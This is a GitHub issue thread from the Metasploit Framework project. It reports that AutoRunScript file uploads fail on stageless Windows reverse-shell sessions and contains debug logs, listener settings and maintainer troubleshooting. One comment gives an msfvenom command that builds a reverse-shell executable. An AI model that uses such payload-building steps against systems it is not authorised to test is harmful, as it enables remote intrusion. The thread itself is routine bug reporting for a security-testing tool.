Issue with "Download", "Upload"

Admin9961 commented 12 months ago

In command shell, these 2 commands work only when interacting with the session, but if you try to automate it through "AutoRunScript", these 2 commands will fail with the statement:

[*] Processing shell_scripts.rc for ERB directives.
resource (shell_scripts.rc)> upload H1.txt H1.txt
[*] Max line length is 4096
[*] /usr/bin/printf '\0\377\376\116\130\114\103\177\45\45\15\12' Failed: nil != "\x00\xFF\xFENXLC\x7F%%\r\n"
[*] printf '\0\377\376\106\104\112\107\177\45\45\15\12' Failed: nil != "\x00\xFF\xFEFDJG\x7F%%\r\n"
[*] /usr/bin/printf %b '\0\377\376\122\112\131\127\177\45\45\15\12' Failed: nil != "\x00\xFF\xFERJYW\x7F%%\r\n"
[*] printf %b '\0\377\376\103\121\132\126\177\45\45\15\12' Failed: nil != "\x00\xFF\xFECQZV\x7F%%\r\n"
[*] perl -e 'print("\0\377\376\101\116\117\124\177\45\45\15\12")' Failed: nil != "\x00\xFF\xFEANOT\x7F%%\r\n"
[*] gawk 'BEGIN {ORS="";print "\x00\xff\xfe\x47\x50\x50\x4d\x7f\x25\x25\x0d\x0a"}' </dev/null Failed: nil != "\x00\xFF\xFEGPPM\x7F%%\r\n"
[-] Error occurred while uploading <H1.txt> to <H1.txt> - Connection reset by peer

Another try was performed by inserting the complete Path in resource.rc, and if failed aswell. I specify that this happened against a Windows 10 machine with a native windows/x64/shell_reverse_tcp. I don't know if other command shell based payloads are affected. The "H1.txt" was just 7 bytes of data. The attempt furtherly, cause the session to crash and exit.

github-actions[bot] commented 12 months ago

It looks like there's not enough information to replicate this issue. Please provide any relevant output and logs which may be useful in diagnosing the issue.

This includes:

All of the item points within this template
The result of the debug command in your Metasploit console
Screenshots showing the issues you're having
Exact replication steps

The easier it is for us to replicate and debug an issue means there's a higher chance of this issue being resolved.

Admin9961 commented 12 months ago

This time I did it with the Powershell variant of the payload (cmd/windows/powershell/x64/shell_reverse_tcp) and I got the same error aswell, however the debug log looks weird, it says that I miss a dependancy for another payload which I'm not working on (the encrypted/shell variant), then another fake error (can't bind to 0.0.0.0:8443 that is false lol) here is the full snippet with the "debug" command (AV is disabled, this is not AV problem)

`## Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

Collapse

``` [framework/features] [framework/ui/console] ActiveModule=exploit/multi/handler [multi/handler] payload=cmd/windows/powershell/x64/shell_reverse_tcp LPORT=[private_port] LHOST=[private_ip] ExitOnSession=false AutoUnhookProcess=false AutoSystemInfo=true AutoLoadStdapi=true MeterpreterDebugBuild=false EnableStageEncoding=false StagerVerifySSLCert=false EXITFUNC=process AutoRunScript=shell_scripts.rc CommandShellCleanupCommand= InitialAutoRunScript= AutoVerifySession=true CreateSession=true EnableContextEncoding=true VERBOSE=true WORKSPACE= WfsDelay=2 ContextInformationFile= DisablePayloadHandler=false ListenerTimeout=0 ReverseListenerBindPort= ReverseAllowProxy=false ReverseListenerComm= ReverseListenerBindAddress= ReverseListenerThreaded=false StagerRetryCount=10 StagerRetryWait=5 PingbackRetries=0 PingbackSleep=30 PayloadUUIDSeed= PayloadUUIDRaw= PayloadUUIDName= PayloadUUIDTracking=false StageEncoder= StageEncoderSaveRegisters= StageEncodingFallback=true PrependMigrate=false PrependMigrateProc= PayloadBindPort= AutoVerifySessionTimeout=30 EnableUnicodeEncoding=false HandlerSSLCert= SessionRetryTotal=3600 SessionRetryWait=10 SessionExpirationTimeout=604800 SessionCommunicationTimeout=300 PayloadProcessCommandLine= MeterpreterDebugLogging= EXTENSIONS= EXTINIT= Powershell::persist=false Powershell::prepend_sleep= Powershell::prepend_protections_bypass=auto Powershell::strip_comments=true Powershell::strip_whitespace=false Powershell::sub_vars=true Powershell::sub_funcs=false Powershell::exec_in_place=false Powershell::exec_rc4=false Powershell::remove_comspec=false Powershell::noninteractive=true Powershell::encode_final_payload=false Powershell::encode_inner_payload=false Powershell::wrap_double_quotes=true Powershell::no_equals=false Powershell::method=reflection ``` ```[11/14/2023 21:13:26] [e(0)] core: Exploit failed (multi/handler): Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8443). - Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8443). [11/14/2023 21:15:00] [e(0)] core: Errno::ECONNRESET Connection reset by peer [11/14/2023 21:15:04] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt [11/14/2023 21:18:11] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt [11/14/2023 21:19:01] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt [11/14/2023 21:21:03] [e(0)] core: Errno::ECONNRESET Connection reset by peer [11/14/2023 21:21:09] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt [11/14/2023 21:26:52] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt [11/14/2023 21:29:59] [e(0)] core: Errno::ECONNRESET Connection reset by peer [11/14/2023 21:30:07] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt ```

Web Service Errors

The following web service errors occurred before the issue occurred:

Collapse

``` msf-ws.log does not exist. ```

Framework Logs

The following framework logs were recorded before the issue occurred:

Collapse

``` [11/14/2023 19:00:45] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [11/14/2023 19:41:10] [w(0)] core: Session manipulation failed: can't be called from trap context ["/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/irb-1.7.4/lib/irb/extend-command.rb:233:in `require_relative'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/irb-1.7.4/lib/irb/extend-command.rb:233:in `block in load_command'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/irb-1.7.4/lib/irb/extend-command.rb:229:in `each'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/irb-1.7.4/lib/irb/extend-command.rb:229:in `load_command'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/irb-1.7.4/lib/irb/context.rb:581:in `transform_args?'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/irb-1.7.4/lib/irb/ruby-lex.rb:45:in `single_line_command?'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/irb-1.7.4/lib/irb/ruby-lex.rb:70:in `block in configure_io'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline/line_editor.rb:1767:in `confirm_multiline_termination'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline/line_editor.rb:2502:in `ed_newline'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline/line_editor.rb:1436:in `call'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline/line_editor.rb:1436:in `wrap_method_call'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline/line_editor.rb:1489:in `block in process_key'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline/line_editor.rb:1407:in `run_for_operators'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline/line_editor.rb:1488:in `process_key'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline/line_editor.rb:1525:in `normal_char'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline/line_editor.rb:1591:in `input_key'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline.rb:354:in `block (3 levels) in inner_readline'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline.rb:353:in `each'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline.rb:353:in `block (2 levels) in inner_readline'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline.rb:428:in `block in read_io'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline.rb:398:in `loop'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline.rb:398:in `read_io'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline.rb:351:in `block in inner_readline'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline.rb:349:in `loop'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline.rb:349:in `inner_readline'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline.rb:277:in `block in readmultiline'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline/ansi.rb:152:in `block in with_raw_input'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline/ansi.rb:152:in `raw'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline/ansi.rb:152:in `with_raw_input'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline.rb:273:in `readmultiline'", "/opt/metasploit-framework/embedded/lib/ruby/3.0.0/forwardable.rb:238:in `readmultiline'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/irb-1.7.4/lib/irb/input-method.rb:422:in `gets'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/irb-1.7.4/lib/irb.rb:540:in `block (2 levels) in eval_input'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/irb-1.7.4/lib/irb.rb:764:in `signal_status'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/irb-1.7.4/lib/irb.rb:539:in `block in eval_input'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/irb-1.7.4/lib/irb/ruby-lex.rb:220:in `readmultiline'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/irb-1.7.4/lib/irb/ruby-lex.rb:246:in `block in each_top_level_statement'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/irb-1.7.4/lib/irb/ruby-lex.rb:245:in `loop'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/irb-1.7.4/lib/irb/ruby-lex.rb:245:in `each_top_level_statement'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/irb-1.7.4/lib/irb.rb:558:in `eval_input'", "/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/irb_shell.rb:47:in `rescue in block in run'", "/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/irb_shell.rb:44:in `block in run'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline/line_editor.rb:243:in `block in set_signal_handlers'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline/ansi.rb:160:in `wait_readable'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline/ansi.rb:160:in `block in inner_getc'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline/ansi.rb:160:in `raw'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline/ansi.rb:160:in `inner_getc'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline/ansi.rb:207:in `getc'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline.rb:399:in `block in read_io'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline.rb:398:in `loop'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline.rb:398:in `read_io'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline.rb:351:in `block in inner_readline'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline.rb:349:in `loop'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline.rb:349:in `inner_readline'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline.rb:277:in `block in readmultiline'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline/ansi.rb:152:in `block in with_raw_input'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline/ansi.rb:152:in `raw'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline/ansi.rb:152:in `with_raw_input'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/reline-0.3.8/lib/reline.rb:273:in `readmultiline'", "/opt/metasploit-framework/embedded/lib/ruby/3.0.0/forwardable.rb:238:in `readmultiline'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/irb-1.7.4/lib/irb/input-method.rb:422:in `gets'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/irb-1.7.4/lib/irb.rb:540:in `block (2 levels) in eval_input'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/irb-1.7.4/lib/irb.rb:764:in `signal_status'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/irb-1.7.4/lib/irb.rb:539:in `block in eval_input'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/irb-1.7.4/lib/irb/ruby-lex.rb:220:in `readmultiline'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/irb-1.7.4/lib/irb/ruby-lex.rb:246:in `block in each_top_level_statement'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/irb-1.7.4/lib/irb/ruby-lex.rb:245:in `loop'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/irb-1.7.4/lib/irb/ruby-lex.rb:245:in `each_top_level_statement'", "/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/irb-1.7.4/lib/irb.rb:558:in `eval_input'", "/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/irb_shell.rb:53:in `block in run'", "/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/irb_shell.rb:52:in `catch'", "/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/irb_shell.rb:52:in `run'", "/opt/metasploit-framework/embedded/framework/lib/msf/base/sessions/command_shell.rb:550:in `block in cmd_irb'", "/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell/history_manager.rb:33:in `with_context'", "/opt/metasploit-framework/embedded/framework/lib/msf/base/sessions/command_shell.rb:549:in `cmd_irb'", "/opt/metasploit-framework/embedded/framework/lib/msf/base/sessions/command_shell.rb:622:in `run_builtin_cmd'", "/opt/metasploit-framework/embedded/framework/lib/msf/base/sessions/command_shell.rb:610:in `run_single'", "/opt/metasploit-framework/embedded/framework/lib/msf/base/sessions/command_shell.rb:774:in `_interact_stream'", "/opt/metasploit-framework/embedded/framework/lib/msf/base/sessions/command_shell.rb:750:in `block in _interact'", "/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell/history_manager.rb:33:in `with_context'", "/opt/metasploit-framework/embedded/framework/lib/msf/base/sessions/command_shell.rb:749:in `_interact'", "/opt/metasploit-framework/embedded/framework/lib/rex/ui/interactive.rb:53:in `interact'", "/opt/metasploit-framework/embedded/framework/lib/msf/ui/console/command_dispatcher/core.rb:1739:in `cmd_sessions'", "/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:581:in `run_command'", "/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:530:in `block in run_single'", "/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `each'", "/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `run_single'", "/opt/metasploit-framework/embedded/framework/lib/msf/ui/console/command_dispatcher/exploit.rb:198:in `cmd_exploit'", "/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:581:in `run_command'", "/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:530:in `block in run_single'", "/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `each'", "/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `run_single'", "/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.rb:165:in `block in run'", "/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.rb:309:in `block in with_history_manager_context'", "/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell/history_manager.rb:33:in `with_context'", "/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.rb:306:in `with_history_manager_context'", "/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.rb:133:in `run'", "/opt/metasploit-framework/embedded/framework/lib/metasploit/framework/command/console.rb:54:in `start'", "/opt/metasploit-framework/embedded/framework/lib/metasploit/framework/command/base.rb:82:in `start'", "/opt/metasploit-framework/bin/../embedded/framework/msfconsole:23:in `

'"] [11/14/2023 19:48:37] [i(0)] core: Trying to continue despite failed database creation: could not connect to server: Connection refused Is the server running on host "127.0.0.1" and accepting TCP/IP connections on port 5433? [11/14/2023 19:48:37] [e(0)] core: DB.connect threw an exception - ActiveRecord::ConnectionNotEstablished could not connect to server: Connection refused Is the server running on host "127.0.0.1" and accepting TCP/IP connections on port 5433? [11/14/2023 19:48:37] [e(0)] core: Failed to connect to the database: could not connect to server: Connection refused Is the server running on host "127.0.0.1" and accepting TCP/IP connections on port 5433? [11/14/2023 19:48:43] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [11/14/2023 19:48:43] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [11/14/2023 19:48:50] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [11/14/2023 19:48:51] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [11/14/2023 19:51:52] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt [11/14/2023 19:52:14] [d(0)] core: Session 1 failed to negotiate TLV encryption [11/14/2023 20:10:03] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt [11/14/2023 20:30:27] [e(0)] core: Errno::ECONNRESET Connection reset by peer [11/14/2023 20:34:35] [e(0)] core: Errno::ECONNRESET Connection reset by peer [11/14/2023 20:40:15] [e(0)] core: Errno::ECONNRESET Connection reset by peer [11/14/2023 20:44:38] [e(0)] core: Errno::ECONNRESET Connection reset by peer [11/14/2023 20:56:38] [w(0)] core: Exception in scheduler thread EOFError EOFError [11/14/2023 20:56:38] [w(0)] core: Exception in scheduler thread EOFError EOFError [11/14/2023 20:56:38] [w(0)] core: Exception in scheduler thread EOFError EOFError [11/14/2023 20:56:38] [w(0)] core: Exception in scheduler thread EOFError EOFError [11/14/2023 20:56:38] [w(0)] core: Exception in scheduler thread EOFError EOFError [11/14/2023 20:56:38] [w(0)] core: Exception in scheduler thread EOFError EOFError [11/14/2023 20:56:38] [w(0)] core: Exception in scheduler thread EOFError EOFError [11/14/2023 20:56:38] [w(0)] core: Exception in scheduler thread EOFError EOFError [11/14/2023 20:56:38] [w(0)] core: Exception in scheduler thread EOFError EOFError [11/14/2023 20:56:38] [w(0)] core: Exception in scheduler thread EOFError EOFError [11/14/2023 20:56:39] [w(0)] core: Exception in scheduler thread EOFError EOFError [11/14/2023 20:56:41] [e(0)] core: Errno::ECONNRESET Connection reset by peer [11/14/2023 20:58:29] [e(0)] core: Errno::ENOENT No such file or directory @ rb_sysopen - [11/14/2023 21:03:05] [e(0)] core: Errno::ECONNRESET Connection reset by peer [11/14/2023 21:10:30] [e(0)] core: Errno::ECONNRESET Connection reset by peer [11/14/2023 21:13:26] [e(0)] core: Exploit failed (multi/handler): Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8443). - Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8443). [11/14/2023 21:15:00] [e(0)] core: Errno::ECONNRESET Connection reset by peer [11/14/2023 21:15:04] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt [11/14/2023 21:18:11] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt [11/14/2023 21:19:01] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt [11/14/2023 21:21:03] [e(0)] core: Errno::ECONNRESET Connection reset by peer [11/14/2023 21:21:09] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt [11/14/2023 21:26:52] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt [11/14/2023 21:29:59] [e(0)] core: Errno::ECONNRESET Connection reset by peer [11/14/2023 21:30:07] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt ```

Web Service Logs

The following web service logs were recorded before the issue occurred:

Collapse

``` msf-ws.log does not exist. ```

Version/Install

The versions and install method of your Metasploit setup:

Collapse

``` Framework: 6.3.42-dev- Ruby: ruby 3.0.2p107 (2021-07-07 revision 0db68f0233) [x86_64-linux] OpenSSL: OpenSSL 1.1.1m 14 Dec 2021 Install Root: /opt/metasploit-framework/embedded/framework Session Type: postgresql selected, no connection Install Method: Omnibus Installer ```

`

Admin9961 commented 12 months ago

Update: issue doesn't happen with staged command shell payloads, just stageless (windows/x64/shell_rev_tcp & win/shell_rev_tcp), the basic stageless payload not the "encrypted" variant, I do not miss any dependancy, it's stageless command shell bug confirmed

adfoster-r7 commented 12 months ago

Thanks for the update; Any idea what's going wrong? 👀

Admin9961 commented 12 months ago

Basically it looks like that AutoRunScript can't download/upload data (not even a 1 byte .txt) if the selected payload is stageless (as result you get the error served at the start of the post). By selecting a staged payload things work as expected. This apply just to windows command shell, not to Meterpreter. Meterpreter is not affected by the flaw. I don't exactly know how to solve this issue on my own, I need someone to open a pull request. The issue is not environment related, my Linux distro is not flawed.

Admin9961 commented 12 months ago

To emulate the bug, just do msfvenom -p windows/shell_reverse_tcp lhost=IP lport=port -f exe -o shell.exe then vim "myscript.rc" => upload yourexample.txt yourexample.txt (you don't have to actually specify the full path)

Listener conf then AutoRunScript => myscript.rc run you should get the bugged output I've posted at the start.

Admin9961 commented 12 months ago

If you do the same steps with a staged payload, for example the classic windows/shell/reverse_tcp everything works. I think this may happening becouse stageless sessions are less interactive. The flaw it's restricted to AutoRunScript, becouse you have the issue "solved" by interacting with the shell manually, but having such a cool feature as AutoRunScript flawed is not good. Automating routine is important.

bwatters-r7 commented 11 months ago

If I'm understanding correctly, the issue only happens on a stageless shell session when you do an autorun? And it does not happen if you interact with the staged session? I have 2 wild guesses: 1) There might be an issue with initializing the channel.... maybe there's some garbage in it. I can't explain why it would behave differently in staged and stageless, though, so I'd be a little surprised if this was the case. 2) Curious if there's a race condition where the autorun script sends commands through the connection before the payload is completely ready. A stageless payload is going to have everything set up before the callback ever hits the framework listener, but a staged session still has to upload and inject the second stage. A test for this would be to just add a sleep or something as the first command in the script.

EDIT: No, I see I had that backward..... stageless does not work, but staged does..... weird.

bwatters-r7 commented 11 months ago

Can you post the full command for msfvenom without IPs? Basically, I want to know what fileformat and any options you're using.

Admin9961 commented 11 months ago

msfvenom -p windows/shell_reverse_tcp lhost=x.x.x.x lport=x.x.x.x -f exe -o test.exe do a test yourself you'll see i'm right, in "AutoRunScript" just put in a "script.rc" containing the string upload test.txt test.txt for my own test there was no need to specify the path becouse I'm working in just "current folder mode", no need to specify the full path. By interacting with the session and typing the upload command manually the issue is "solved", it's basically AutoRunScript failure Normal behavior: file should be encoded in base64, then decoded with certutil on remote target

on listener I have default conf

 Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   ExitOnSession           true             yes       Return from the exploit after a session has been created
   ListenerTimeout         0                no        The maximum number of seconds to wait for new sessions
   VERBOSE                 true             no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session

Payload advanced options (windows/shell_reverse_tcp):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript               script.rc        no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   PrependMigrate              false            yes       Spawns and runs shellcode in new process
   PrependMigrateProc                           no        Process to spawn and run shellcode in
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     true             no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Admin9961 commented 11 months ago

I found another interesting string in the debug command: RuntimeError Can't find command on the victim for writing binary data <= ???

bwatters-r7 commented 11 months ago

Doing some quick looking, Can't find command on the victim for writing binary data is an error generated by _write_file_unix_shell when it cannot find a suitable binary to send data. In a couple minutes of checking, I don't think this method should be called when the session platform is windows. What do you get when you run sessions -l and sessions -x at the msf prompt while these sessions are connected?

bwatters-r7 commented 11 months ago

Oooops; I meant sessions -v

Admin9961 commented 11 months ago

sessions -l output:

 7         shell x86/windows  Shell Banner: Microsoft Windows [Version 10.0.19042.844] (c) 2020 Microsoft ...  my_ip:8443 -> remote_ip:12501 (remote_ip)
  8         shell x86/windows  Shell Banner: Microsoft Windows [Version 10.0.19042.844] (c) 2020 Microsoft ...

output for sessions -v

Active sessions
===============

  Session ID: 7
        Name:
        Type: shell windows
        Info:
Shell Banner:
Microsoft Windows [Version 10.0.19042.844]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\(private path)>
-----

      Tunnel: my_ip:8443 -> remote_ip:12501 (remote_ip)
         Via: exploit/multi/handler
   Encrypted: No
        UUID:
     CheckIn: <none>
  Registered: No

  Session ID: 8
        Name:
        Type: shell windows
        Info:
Shell Banner:
Microsoft Windows [Version 10.0.19042.844]
(c) 2020 Microsoft Corporation. All rights reserved.
-----

      Tunnel: my_ip:8443 -> remote_ip:12504 (remote_ip)
         Via: exploit/multi/handler
   Encrypted: No
        UUID:
     CheckIn: <none>
  Registered: No

Admin9961 commented 11 months ago

Can I know where these methods are defined? I'm trying to investigate on myself but I can't find autorunscript.rb

Admin9961 commented 11 months ago

Yes, this is happening becouse msf doesn't perform enough validation before launching autorunscript, thus making bad assumption. I confirmed that casually

[*] Session ID 12 (x.x.x.x.x.x.x.x:443 -> 204.101.161.xx:40061) processing AutoRunScript 'script.rc' [*] Processing script.rc for ERB directives.

I was running test on my own devices, when at some point an unknown guy portscanned my listener (it's not the IP of my own device lol, he probably not even running windows). The correct behaviour should be that it first check if the session is valid, then it start processing commands. It started "Processing script.rc" first instead, without any session check before starting

github-actions[bot] commented 10 months ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] commented 9 months ago

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

rapid7 / metasploit-framework